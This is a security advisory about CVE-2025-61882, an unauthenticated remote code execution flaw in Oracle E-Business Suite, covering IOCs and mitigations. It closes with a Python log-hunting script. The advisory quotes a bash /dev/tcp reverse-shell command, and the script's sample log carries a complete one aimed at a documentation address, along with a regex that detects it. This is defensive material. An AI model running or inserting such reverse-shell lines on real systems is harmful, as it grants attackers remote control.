Vulnerability Alerts | 2 mins read | October 7, 2025

CVE-2025-61882: Unauthenticated Remote Code Execution in Oracle E-Business Suite


A critical security vulnerability has been disclosed in the widely used Oracle E-Business Suite (EBS). Tracked as CVE-2025-61882 with a CVSS Base Score of 9.8 (Critical), this flaw affects versions 12.2.3 through 12.2.14. If successfully exploited, this exposure allows unauthenticated attackers to perform remote code execution (RCE) over a network without needing any user credentials. Given that the vulnerability is already accompanied by Indicators of Compromise (IOCs), organizations running affected versions should consider this an immediate, top-priority threat.

Summary

Vulnerability: Remote Code Execution (RCE) due to a flaw in BI Publisher Integration within Oracle Concurrent Processing.

CVE: CVE-2025-61882

Impact: Unauthenticated, remote code execution. Full compromise of the affected system and potential data loss or service disruption.

Affected Versions: Oracle E-Business Suite versions 12.2.3 through 12.2.14.

Severity: Critical, CVSS 9.8

Fix: Apply the necessary updates provided in Oracle's Security Alert. The October 2023 Critical Patch Update is a prerequisite.

How the attack works

The core of CVE-2025-61882 is a vulnerability in the BI Publisher Integration component of Oracle Concurrent Processing within EBS. The vulnerability resides in a network protocol endpoint that is reachable without authentication, so an attacker can exploit it remotely without a valid username or password. Successful exploitation lets the attacker execute arbitrary code with the privileges of the affected service, i.e. Remote Code Execution (RCE). Observed Indicators of Compromise (IOCs) suggest attackers are leveraging this flaw to establish outbound TCP connections, likely for a reverse shell (sh -c /bin/bash -i >& /dev/tcp// 0>&1), which grants interactive command-line access and complete control of the compromised server.

Exploitation in the wild

Oracle has released an advisory due to the severity of the threat, and associated IOCs confirm that threat actors are actively probing for and exploiting this exposure. Specific IP addresses (e.g., 200.107.207.26 and 185.181.60.11) and exploit files (referenced by SHA 256 hashes) point to active reconnaissance and execution attempts against internet-facing EBS instances. The simple, unauthenticated nature of the exploit makes automated scanning and mass exploitation trivial for cybercriminals.

What makes this so dangerous

This vulnerability combines several factors that elevate it to a top-tier security risk:

  • Critical CVSS score: A CVSS score of 9.8 signifies maximum severity, indicating the exploit is highly impactful and easily accessible.
  • Unauthenticated RCE: The attack requires no user credentials or interaction, meaning any internet-facing system running a vulnerable version is exposed to the threat.
  • Full system compromise: Successful exploitation results in Remote Code Execution, granting the attacker complete control over the affected Oracle EBS server.
  • Clear IOCs: The public existence of IOCs (including specific IP addresses and reverse shell commands) confirms this is not a theoretical threat but is being actively targeted in the wild.

Mitigation steps and best practices

There is no grace period: the flaw is already being exploited in the wild, so administrators must act immediately to secure their environments.

  1. Apply patches immediately: Oracle strongly recommends applying the updates provided in the Security Alert as soon as possible.
  2. Patch prerequisite: Ensure the October 2023 critical patch update is applied, as it is a prerequisite for the application of this Security Alert.
  3. Monitor for IOCs: Security teams must immediately check logs for activity associated with the provided IP addresses and look for signs of the reverse shell command to support hunting and containment.
  4. Restrict network access: Limit network access to the Oracle Concurrent Processing component and the BI Publisher Integration to only trusted internal networks or specific administrative hosts.

  5. Continuous detection: Actively monitor internet-facing assets for newly emerging, unauthenticated exposures like this one to ensure a rapid response process is in place, shortening the window of opportunity for sophisticated attackers.
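As an added illustration of the "Monitor for IOCs" step (example code written for this alert, not Hadrian's or Oracle's tooling), the script below hunts through log lines for the two IP addresses quoted above and for the /dev/tcp reverse-shell shape described in the alert. The sample log lines are constructed, the audit-log format and the TEST-NET destination 203.0.113.9:4444 are assumptions, and the web-server request paths are placeholders rather than the real vulnerable endpoint.

```python
import re

# Indicators quoted in the alert above: source IPs associated with the exploitation activity.
IOC_IPS = {"200.107.207.26", "185.181.60.11"}

# The alert describes a bash reverse shell using /dev/tcp redirection; this pattern matches
# that shape without depending on the destination host and port, which the alert does not give.
REVERSE_SHELL_RE = re.compile(r"bash\s+-i\b.*?/dev/tcp/")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def ioc_ips_in(line: str) -> set[str]:
    """Return the IOC IP addresses that appear anywhere in a log line."""
    return set(IPV4_RE.findall(line)) & IOC_IPS


def has_reverse_shell(line: str) -> bool:
    """True if the line contains the /dev/tcp reverse-shell shape from the alert."""
    return REVERSE_SHELL_RE.search(line) is not None


def hunt(lines):
    """Scan log lines and return (line_number, reason, line) for every hit."""
    hits = []
    for n, line in enumerate(lines, start=1):
        ips = ioc_ips_in(line)
        if ips:
            hits.append((n, "ioc-ip:" + ",".join(sorted(ips)), line))
        if has_reverse_shell(line):
            hits.append((n, "reverse-shell", line))
    return hits


# Constructed sample lines (not real logs): two web-server requests from the IOC IPs and one
# assumed process-audit line carrying a reverse shell aimed at a TEST-NET address.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Oct/2025:09:00:00 +0000] "GET /health HTTP/1.1" 200 12',
    '200.107.207.26 - - [06/Oct/2025:09:00:41 +0000] "POST /example/endpoint HTTP/1.1" 200 512',
    'Oct 06 09:01:02 ebs-app01 audit: cmd="sh -c /bin/bash -i >& /dev/tcp/203.0.113.9/4444 0>&1"',
    '185.181.60.11 - - [06/Oct/2025:09:02:10 +0000] "GET /example/endpoint HTTP/1.1" 404 0',
    '10.0.0.7 - - [06/Oct/2025:09:03:00 +0000] "GET /health HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for n, reason, line in hunt(SAMPLE_LOG):
        print(f"line {n}: {reason}: {line}")
```

Point `hunt()` at real web-server and process-audit logs once the IOC set is extended with the hashes and addresses from Oracle's advisory.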
